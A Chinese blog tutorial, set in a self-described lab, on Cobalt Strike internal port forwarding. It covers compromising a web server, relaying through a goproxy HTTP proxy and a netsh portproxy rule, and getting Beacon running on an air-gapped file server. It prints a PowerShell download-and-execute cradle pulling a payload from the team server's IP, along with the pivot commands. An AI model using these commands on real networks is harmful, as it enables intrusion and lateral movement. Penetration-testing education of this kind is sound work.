如何创建http端口监听_Cobalt Strike之内网端口转发一

TD;LR

在做域内网横向实验的过程中,在控制了域内一台服务器/终端的情况下,通过将Cobalt Strike的socks4a代理,将Beacon shell转发到msf中。通过msf的漏洞利用模块拿到了另一台内网的服务器/终端,此内网的服务器/终端无法连接互联网,只能访问已经控制了的那台服务器。

如果要将一台内网无法连接互联网的服务器/终端反弹回Cobalt Strike,此内网服务器必须需要访问互联网,那么就需要结合端口转发的功能来达到目的。

由于这些知识也刚学习,当时就没把这个实验继续做下去了。

一段时间后,浏览了不少C/S的文章(文章在后面有参考链接,主要参考了snowming大佬的文章),发现要达到这个目的其实不是很难(前人踩坑,后人乘凉 ?),只需要简单的端口转发就可以做的到。

实验环境

windows2012 - webserver

ip1:10.10.10.144

ip2:192.168.15.163

windows 2008 - fileserver

ip:10.10.10.145

cobalt strike 团队服务器 - VPS

ip:211.1.1.181

拓扑图如下:

eb6ab7907d5909c30cdc6d800009cc54.png

注意:VPS不能直接访问到10.10.10.145,10.10.10.145也不能直接出网,这里就是解决如何使10.10.10.145出网,在其上执行shell后反弹回CS服务器。

思路及操作

结合代理以及转发功能,在WEBSERVER上操作。

3a21913e8bcc79ab126930e6701aefc3.png

上线路径:10.10.10.145 → 10.10.10.144:80(HTTP代理)→ 192.168.15.163:8080(端口转发) → 211.1.1.181(监听器上线)

实操演示


VPS连接WEBSERVER服务器,获取立足点

1、连接Cobalt Strike团队服务器,设置好listener。listener设置如下。

723536aa86c9ae5a6a202a72ee948345.png

2、生成payload,利用Scripted Web Delivery(S)模块,payload类型为powershell,端口为80,具体配置看图。

c8d41fa00a1f69d3cf5fc898457b882e.png

5d05cf4958b4dc546d67c30f91e3bd32.png

3、设置完成后,点击launch,即可生成payload。弹出一个窗口,复制如下内容即可。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://211.1.1.181:80/a'))"

4、payload执行完成后,Beacon shell反弹成功。

146ddc0021e7b8fd8396fe926647f1f7.png


5、在WEBSERVER服务器(跳板),设置HTTP代理。使用snowming推荐的goproxy代理工具。

sleep 0upload file # 上传proxy.exe文件shell c:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

aa8e67583f923e6384f621ba3eb76fae.png

6、在WEBSERVER服务器(跳板)上通过netsh开启端口转发。

shell netsh interface portproxy add v4tov4 listenaddress=10.10.10.144 listenport=80 connectaddress=192.168.15.163 connectport=8080

e830d01f9784e56300bda7ff03123b0c.png

7、netstat -an查看端口监听情况,可以看到8080和80端口都出在监听的状态。

27db19f1820960bc37ebdc1165c0816c.png

8、查看端口转发情况

862ad43a26a90c284f9e1ff27a5d1944.png

9、设置内网代理监听器,http proxy填写内网代理地址。10.10.10.144:80。

4c5aa46f6ca19e10f0b6b390a3b6783f.png

b5a62906ee55e5854a1994da06a2fc5a.png

10、生成payload,利用windows Executable(S)模块(这里有个坑,具体可查看参考链接),选择上面创建好的内网代理监听器。

f9e5a1e66b3be5f740f7c0c853204101.png

11、将payload传到FILESERVER服务器上,执行即可反弹成功。

6c8271d87012256841440f0cb770ee08.png

12、具体的详情可以查看参考链接,有具体的详细细节,感谢大佬的分享。

c1dca00799447d88127bbdca4a7d6ded.png

参考:

http://blog.leanote.com/post/snowming/2ec80f7823e0

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值